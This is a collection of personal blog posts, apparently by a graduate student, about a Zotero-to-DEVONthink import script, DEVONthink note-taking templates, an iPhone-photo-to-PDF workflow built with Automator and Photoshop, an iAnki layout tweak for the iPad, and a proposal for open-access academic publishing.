Other possible future improvements that I think could be made to this script or some combination of it and a Firefox plugin if someone has the time to work on it. I unfortunately don’t have any time to work on any of these. Please let me know if you add such features and I’ll post updates to the script:

1. If Zotero has any attachments, such as PDFs of the sources or snapshots for the webpages, the script could be improved so that these could be imported along with the entry.

2. It would be great if a formatted bibliographic entry for the source was added to the main note file created in DEVONthink. Currently this must be done by hand by dragging and dropping citation into the note file.

3. Any notes already in the Zotero entry for a source should be added to the main note file created in DEVONthink.

4. Ideally, the script would recreate the collections structure found in Zotero within DEVONthink.

5. Ideally, the script would check to see if any tags have been added or deleted from Zotero and not only add tags on the first import of the source.

6. Ideally, the script would keep track of itemID info for each entries and use that to judge whether an entry has already been imported into DEVONthink. That way the user can shorten or edit the folder titles etc. in DEVONthink without the script re-importing that entry because it doesn’t find an exact match by title.

7. Ideally, the script or a script and a plugin would somehow eliminate the need to be run – that somehow every time I added a new source to Zotero, DEVONthink would automatically get updated.

UPDATE 1.1

-I got rid of a “display dialog” command leftover from my last minute debugginge
-I added a check to see if Firefox is running, and gives the user the opportunity to quit Firefox, otherwise the script cannot run since the Zotero database is locked.

UPDATE 1.5

-The script now puts all the sources in a sub group “_All” (option to change the name) and then recreates the collection group hierarchy you had in Zotero. (Note: if you move or change the hierarchy of folders in Zotero and run the script again later, it will not delete the old groups or move them)

-I added a few more configurations, an option to control whether you are warned that Firefox will be quit, an option to add the author name to the name of the group/note file created

-Firefox is automatically restarted at the end of the script

UPDATE 1.6

-The script now supports logging. Every new group and file created will log an entry in a log file. This can be turned off and the location of the log file can be customized in the configuration section of the script.

UPDATE:

There are some problems with the way it handles unusual titles of books and although the script works fine for me, I have seen some comments saying others are having trouble. Please post your comments on the script at the DEVONthink thread for the script where I hope we can get some help from more skilled scripters who might have time to work more on this:

DEVONthink and Zotero – DEVONthink Forum

Revisting the Note Taking Problem with DEVONthink

Though I continue to enjoy using the excellent software Scrivener to compose my dissertation, I am still unhappy with my note taking strategies and how I collect and organize this information digitally. After writing several postings on what I wish existed in terms of a software solution for doing research for a book or dissertation (1,2,3) and writing a little script to help improve the imperfect solution I have been using, I still find myself frustrated.

To summarize what I wish I had again in terms of a knowledge database:

As I make a note on a source, e.g. recording a single fact, fragment of information, observation, or summary of an idea from a work I want that piece of information to be taggable so that it can be easily found in the future when searching for that tag. I want to be able to add and tag many such notes quickly and efficiently, some of which are “under” others in the form of a hierarchical order, and which then inherit the tags of their parent notes so that I am saved a lot of repetitive tagging. Every single fragment or note must also contain some link, tag, or meta-data which indicates the source it came from (a book, article, archival document, interview, etc.) so that when I use that note in my dissertation or book, I can easily find the source it came from.1

DEVONthink Pro

I am in the process of shifting my note taking to a powerful knowledge database program called DEVONthink Pro. I was impressed at how quickly and easily I could import all of my nearly one thousand OmniOutliner documents, which I can now preview, search, tag, and group within DEVONthink. I don’t just want to reproduce my existing source-based note structure. I want to experiment with using this application to get just a little closer to my dream knowledge database described above. How am I doing this?

In DEVONthink, I create a group (which is what DEVONthink calls folders) for Sources.

Add a Group for a New Source – Each time I take notes on a new source (a book, movie, archive document, etc.), I create a group for it within this Source folder with the title of the source.

Create and Tag an Overview Document for the Source – In this newly created group I create a new text document with the name of the source in which I give some general information about that source (an overall description or summary) and give it some general tags that well represent the whole source.

Because DEVONthink also creates a gray colored pseudo-tag to every member of a group with the name of the group, any notes that go into this source group will contain a pseudo-tag indicating what source it is from.

Add Notes Using Customized Template Script – After creating and tagging the overview document, every time I want to add a note from this source, I select the overview document and invoke a keyboard shortcut connected to a DEVONthink template I have called “Note On Source” (I’m using Ctrl-Cmd-M) This invokes the creation of a hacked version of an existing template that comes with DEVONthink called “Annotation” written by Eric Böhnisch-Volkmann and modified by Christian Grunenberg. In its modified form the new template script does the following:

a. A new note is created in the source’s group
b. The new note gets a link created by the template script which links to it back to the overview document for the source (assuming it was selected when invoking the script).
c. The new note is then automatically tagged with whatever tags the overview document contained. I can then, of course, add further tags or delete any that may not be relevant to this particular fragment or note.

So what does this method accomplish?

Well, using this method, all my fragments, quotes, and notes from a particular source are together in its own folder, a typical default way of organizing one’s notes. However, every single note can also be found by searching for a particular combination of tags using DEVONthink’s various methods for looking up tagged items. Alternatively, one can create “Smart Groups” that include notes using certain tags. Every note contains a link back to its source, however, both through a direct link in the document, and through its pseudo-tag attached to the originating group. In short, one can find all notes related to certain tags without losing their source (or needing to input it manually in the note), and all notes related to a particular source. The default tagging of new notes on a source saves me a lot of typing, and I can just add any more specific tags relevant for that specific note.

Remaining Issues

Although I’m really impressed with the new 2.x version of the application, there are still a few things that I find less than ideal with DEVONthink to work in, some of which are no fault of the designers, but merely are a result of its developers not having the same specific goals that I have when they created the application.

1. Unlike Yojimbo or Evernote, DEVONthink supports hierarchical groups/folders. This is wonderful, and makes a lot of things possible. However, when selected, parent groups do not list contents of its child groups. Thus if I have a group called “Sources” and a sub-group called “Movies” inside of which I have files or groups related to individual movies, clicking on Sources reveals only an empty folder/group in the standard three pane view (or in icon view, a list of the folders that are in it) instead of all files under it in the hierarchy. Of course, the Finder and other applications often work the same way but it would be fantastic if there was an option to be able to “Go Deep” as one can when viewing folder contents in an application like Leap

2. Although I think someone could further modify the script I hacked to make this work, currently the system as I have it now does not permit no cascading notes: all notes are children of the original source, there aren’t any children notes of notes on a source. Thus the benefits of the kind of hierarchy of bullet points one is used to seeing in a note file is lost.

3. Because almost everything that was originally (in a note taking app like OmniOutliner) fragments that take form as hierarchical bullet points in single document are now fragment files in a hierarchy of folders, much of the power of viewing all of the content of these various fragments together at once is lost. DEVONthink lists all notes as files with single-line names. Ideally my dream note-taking software wouldn’t even need names for the fragments (my hacked version of the script just names them the date plus the name of the source) and would merely directly display the contents of notes so they can be seen juxtaposed with whatever other notes are in the list.

Downloading and Using the “Note on Source” Template

Again, I didn’t write this from scratch, but modified an existing template that comes with DEVONthink Pro. To use it, follow the instructions above. To install it:

1. Download the Script: Note on Source
2. Unzip the script and double click on the _Note on Source___Cmd-Ctrl-M.templatescriptd file inside. DEVONthink Pro will ask you if you want to import or install the template. Choose “Install” and it should now be active with the Cmd-Ctrl-M shortcut or directly in the menu at Data->New from Template->Note on Source

  1. My more ambitious and detailed description of this (including the idea of a “smart outline” which would then become possible) can be found in summary form in this posting. []

Using an iPhone 3GS to Scan Documents and Create PDFs

During my field research in Korea, Taiwan, and China I carried around a hefty camera with me to archives and libraries. On those fortunate occasions when I was allowed to use it, I snapped nice high-contrast “text mode” photos of everything from handwritten documents, mimeographed newspapers, pages of books, and thousands of pictures of microfilm reader screens zoomed in on a particular item. I also developed my own coding system to connect the numbers of the images in the digital camera to items in my notes in order to easily find the images again when I need them in my dissertation.

On other occasions I carried another smaller camera in my backpack for emergencies when I wanted to copy some pages out of books but the pictures were often blurry. I recently discovered, however, that the camera on my iPhone 3GS contains a good enough camera to take decent pictures of books and documents if you have moderate indoor lighting.

The Pics Need Processing

To get optimal results however, pictures of books and documents taken from an iPhone 3GS need to be processed: the contrast and brightness need to be turned way up, the size of the image can be significantly reduced in size (from about 1.1MB to 0.25MB each), and if you are making copies of an article or part of a book, ideally you want the result to be a PDF, not a folder full of pictures. Indeed, it is for this purpose I have logged dozens of hours standing in front of the various PDF scanners in the libraries here at Harvard that I wrote about here.

Processing these pictures is time consuming, and begs for a hack. iPhone applications like JotNot and PocketScan are a nice idea but I find them to be incredibly slow and awkward to use.

So I spent a few hours last night and came up with an inelegant but effective solution that, once set up, makes the whole process of getting iPhone pictures processed and into a readable PDF fast and painless. A real hacker would create a script that does all this for the user in a single step, and I would love to get my hands on such a script but in the meantime, in case there is someone out there who would find this useful, here is my current solution using OS X 10.6 and Adobe Photoshop CS3.

Preparations

You only need to do these steps once to get your computer set up. but they are kind of convoluted. I’m sure someone out there has a more efficient method:

1. Create a folder somewhere easy to get to on your hard drive and call it “Convert”

2. Create a folder (in the same folder as Convert for example) and call it “Converted”

3. Open “Automator” in your Applications folder and create a new Automator workflow that looks like this:

workflow.png

Save this as a workflow that we can attach to the “Convert” folder as a folder action. In the top pop-up menu select “Other…” and choose the “Convert” folder which will contain the iPhone photos you will drop in to have converted into a PDF. The applescript will command Photoshop to do an action I have called “CreatePDF” which will process the images one at a time (see below). The automator workflow then grabs all the files, which Photoshop will save into a folder called “Converted” which you should indicate, and create a PDF from them. The final step cleans up the images in the Convert and Converted folder by deleting them. You can delete this step if you don’t want it to delete the images but I usually drop in copies or exported images so I don’t need them once the PDF has been created. You can if you like, download my Automator application version of this workflow here, modify it for your own use and folder locations and save it as a workflow. Keep in mind you need to change the path on the “rm” commands to point to your Convert and Converted folders.

4. Now we need to open Photoshop in order to create two actions. You can see what my actions look like below and create your own version, or download mine here, import them into Photoshop and modify them for your own needs. In the picture below you can see that I have one action called PrepPDF which actually processes a single image by a) changing from color to grayscale b) increasing the brightness and contrast and c) reducing the size of the image and d) saves the image as a JPEG and compresses it significantly. You may find that you want to process it in some different way. The second action, CreatePDF runs Photoshop’s batch command, performing the PrepPDF action on every image it finds in the Convert folder and saves the resulting processed image in the Converted folder.

adobeactions.png

5. Finally, in the Finder, right click on the “Convert” folder and choose “Folder Actions Setup…” and attach the workflow you created in Automator.

Now things are set up and you will be able to convert your pictures to PDF whenever you like by the means below. You won’t have to repeat the steps above:

If things don’t go right when setting up, make sure the files are all pointing to the right locations, the correct folders, and the correct names for the actions in Photoshop and the action set they are saved in.

Going from iPhone Pictures to Readable PDF

1. Take pictures of the document or book in decent lighting. Click on the screen to focus if it is not focusing properly. Would be nice to put together a nice copy stand to hold the iPhone up while you take pictures, but I’m not that kind of hacker.

2. Import your pictures of the documents/books from your iPhone into iPhoto or, via Image Capture, into your computer somewhere. I don’t recommend importing the pictures from the iPhone directly into the “Convert” folder as the copying process is slow and the script seems to speed ahead of the copying and end up with incomplete PDFs.

3. Open Photoshop. The script should launch it, but I find it work better when it is already open.

4. With Photoshop open, drag and drop your images (or a copy of them, by holding down the option key) into the “Convert” folder. It will run the Automator workflow, which will run the Photoshop action CreatePDF which will run PrepPDF on each picture found in the Convert folder, dump them into the Converted folder after processing them, and when it is done the Automator script will take those processed images in the Converted folder, create a PDF out of them, and delete all the images in both folder so it is clean and ready for the next job. The PDF will be found on the Desktop (this old Automator action seems to be broken in Snow Leopard and I can’t get it to save the PDF anywhere else).

With this I have been able to, even while standing in the stacks of my library, whip out my iPhone and, holding the book open, snap pictures of an interesting chapter etc. and process them quickly and easily into PDFs once I get home. Here is one short example of a PDF created from some pictures taken in the stacks with my iPhone.

Update: If you are converting a lot of pictures into a single PDF, the Applescript in the first command can time out. I added two lines to my workflow to increase the timeout from the default two minutes to 10 minutes:

tell application "Adobe Photoshop CS3"
  with timeout of 600 seconds
    do action "PrepSave" from "Default Actions"
  end timeout
end tell

iAnki for iPad Hack

I recently broke down and got an iPad. I use it mostly for reading PDFs on the run, watching movies, taking notes (with external bluetooth keyboard), and studying my daily flashcards.

After trying (and writing reviews of) many different flashcard programs over the years, and even designing some of my own many years ago, I become a loyal daily user of an open source project called Anki (read my review here). It is, in my opinion, the best program around that uses “spaced repetition” or interval study to prompt you only to review information that you are on the verge of forgetting. It helps me keep up on vocabulary in various languages and even serves as kind of daily “meditation of repetitive action” for me.

I can use Anki on my iPhone/iPad through a browser based script called iAnki but there were some things about the layout of the iAnki plug-in which I didn’t think worked well for the big screen of the iPad, which is now my primary way of studying vocab decks when I’m out of the house.

I made some changes to the HTML in the plug-in that I think work better for me. These include:

1. Increasing the font sizes of several fields. 2. Removing the “Show Answer” button and making most of the screen function as a “Show Answer” button so you you don’t need to reach and hit the button. 3. Moving the 1 and 3 buttons to the left edge where I can easily reach them while holding my iPad. 4. Moving the 2 and 4 buttons to the right edge where I can easily reach them.

For anyone out there also using iAnki on an iPad who want to try my hack here is what you do:

1. Download the hacked template here.

2. Unzip it and use it to replace the existing ianki.html file that is in
the iAnki plugin folder. For example, on my Mac the old ianki file is
found:

~/Library/Application Support/Anki/plugins/ianki_ext/templates/
ianki.html

Replace that file with the new one you downloaded.

3. Open up Anki, launch the iAnki plug and install it on your iPad (you’ll need to
install and bookmark it again if you had it installed already)

If you use Anki, please support Damien’s programming efforts in Japan with a donation and congratulate him on his recent marriage.

Tell Me Why This Couldn’t Work

I found lots of interesting book offerings in the Routledge Asian Studies catalog I got in the mail today. Government and Politics in Taiwan is out in paperback, I’d love to learn a bit more about that. Oh, $43 seems a little much for a paperback. Legacies of the Asia-Pacific War looks interesting. Hmm, $125 seems a little unreasonable for a 240 pager, even if it is hardback and all. Ooh, Debating Culture in Interwar China, ah but, this 176 page book is $130. The Third Chinese Revolutionary Civil War, 1945-49 seems right down my alley, but $160 for that 224 page book is out of my range and is probably not where your average library would want to invest. But don’t worry, you can buy a Kindle version of the book for only $127 at Amazon! Hey, a four volume set on Imperial Japan and the World 1931-1945 looks fantastic, and looks to include a collection of influential historical essays on the topic. Oh, these four books will set you back $1295.

It is true Routledge is worse than many publishers, but this is beyond ridiculous. I’m fortunate enough to have access to Harvard libraries until I graduate (fingers crossed) next year, but the chances are very good that whatever libraries I can find nearby throughout the rest of my career are the kind who cringe at these prices. I don’t really blame the publishers, though. They are just trying to make a buck in a tough industry with books that have very low chances of selling more than a few copies here and there.

However, I do blame academia for making book publishing such a central part of career advancement. I really wish they would support a wider range of formats and a completely digital open access but peer reviewed world of scholarly interaction, given the increased potential it offers that informed readers outside our small academic world to participate more actively in the process.

Perhaps my expectations are too high, but even if monograph-length publications of the traditional variety are here to stay, can someone tell me why we can’t do something like this:

1. Scholar gets an annual personal publication fund from department, its size based on multiple variables, including perhaps, evaluation of past publications, a department’s commitment to support research in a tough field that is poorly funded by grants and professional associations.

2. Scholar writes a manuscript (a book, an article, but also other multi-media or film projects etc. ought to be included).

3. Scholar submits manuscript to a professional association along with small administration fee for free distribution of work to readers (or viewers, etc.).

4. Professional association finds some qualified unpaid anonymous readers for the work to evaluate its quality and distributes copies to them (the way publishers do now).

5. Readers return an evaluation that concludes refuse, revise, or publish with some indication of what relative importance the work has in terms of its contribution to the field from their perspective.

6. If it passes peer review, the professional association gives the scholar back the evaluation reports, an official endorsement (which can be used to promote the work, once “published”), and if funding is available, makes an offer of some amount of money towards publication of the work, in relation to the relative importance of the work attributed to it by its readers, its own further evaluation, and its budget for the year.

7. If the work passes peer review and the money offered by the professional association is sufficient for publication, proceed to step (9). Otherwise,

8. If the offered money is insufficient for publication costs or the professional association refuses to endorse it, and the scholar does not wish to make up the difference from her/his personal publication fund, they then repeat steps (3) to (6) seeking help from other professional associations whose evaluation of quality will add to the prestige and funding of the work, or other funding sources (departmental, university, other institutions) until they get enough money in offers or they revise or abandon the research project.

Once the scholar has decided that they have enough support from professional associations, grants, further departmental support, or contribution from their annual personal publication fund they proceed with publication and spend their funds in the following manner:

9. (Optional) Pay lump sum to a publisher-consultant who handles the administrative tasks and payment in below steps (10) to (13) if the scholar doesn’t want to deal with it personally or through someone at their own institution hired specifically for this task. There is to be no transferral of copyright away from the scholar either way and this publisher-consultant does not have any role in determining whether or not something gets published. In this model the publisher is an administrator who has contacts for managing the below steps.

10. Pay for X hours of labor to hire an editor-consultant to help improve the language and writing of the manuscript beyond the quality of its academic content.

11. Pay for Y hours of labor to hire a designer-consultant to create the print and digital presentation for the work (for desktop/mobile web browsers and e-reader applications).

12. Pay $Z for the fees to have the metadata for the work permanently indexed and its files hosted in multiple online depositories, including important information on its peer-reviewed endorsements and positive/negative evaluation reports.

13. (If you really want to make a paper version) submit the print formatted version of the work to all the major online print-on-demand services where anyone can order a cheap paper copy, including both libraries and average readers.

Here are the some of the strengths of a system like this:

-It leaves the copyright in the hands of the author, who will hopefully release the text with a Creative Commons license for maximum distribution and use.

-It imagines a new and powerful role for professional associations, or at least a transformation of traditional journal editorial boards/networks into more broadly defined associations who continue to have, among their primary duties, the evaluation of scholarly work in their field.

-It recognizes that publishing, even digital or print-on-demand works, can be costly process involving many hours of labor beyond that of the author and the anonymous readers.

-It leaves peer review intact, but shifts it from publishers to professional associations which should themselves proliferate in number and each will naturally develop differing perceived standards of quality and funding sources. With the decline of traditional academic publishing, these organizations should receive funding from universities and outside grant institutions or at least provide them with recommendations of where their funding should go.

-It allows for multiple sources of funding both from professional associations that participate in the peer review process but also allows scholars to use their own annual publishing funds, and further grants from university or other institutions.

-Since personal or departmental funds may end up partly or completely funding the publication of works that were poorly evaluated in the peer-review process and couldn’t get financial support from sources based on its quality, it does little to stop bad research from getting published. It does, however, prevent them from creating a burden on the traditional publisher who currently pass that cost onto the consumers of information – since now publishers play no part in the selection process or have any stake in the success of its publication – the publisher, editor, designer, and digital index/content hosts are all paid for their work regardless. Also, since such poor quality publications will not be able to promote themselves by showing that they have the endorsements of, and positive evaluations of reputable professional associations, they will simply get cited less and can get filtered out in various ways during the source search process. However, even bad works or ones on extremely obscure topics can sometimes be useful, if but for a footnote or two that turns us on to a good source.

In this system what is the role for traditional academic publishing companies as they exist now?

None. Universities who support many of them should eventually dissolve them but support them long enough to allow a relatively smooth transition for its employees to find niches in the businesses that should grow from providing services in step (9) to step (12). Book paper printing should be all done through print-on-demand services as the print medium slowly declines. Marketing/promotion of the traditional kind will ideally become a minimal part of the equation as association endorsements and evaluations become the dominant stamp of quality and citation networking power comes to rule the day. Of course, you can add a “marketing” budget for promotion and advertising between steps (11) and (12) above if such funds are available but hopefully this will be seen as a practice resorted to mostly by those who failed to receive strong endorsement from professional associations. No one promotes our journal articles, why should we treat our academic books and other projects differently? If it gets cited, read, and referenced, is that not enough to ensure its spread, especially if the works are openly available and thus offer no barrier to access.

Now, tell me why can’t this work? Why won’t something similar to this emerge from the ridiculous state of academic publishing today when it really wakes up? Let me know what you think.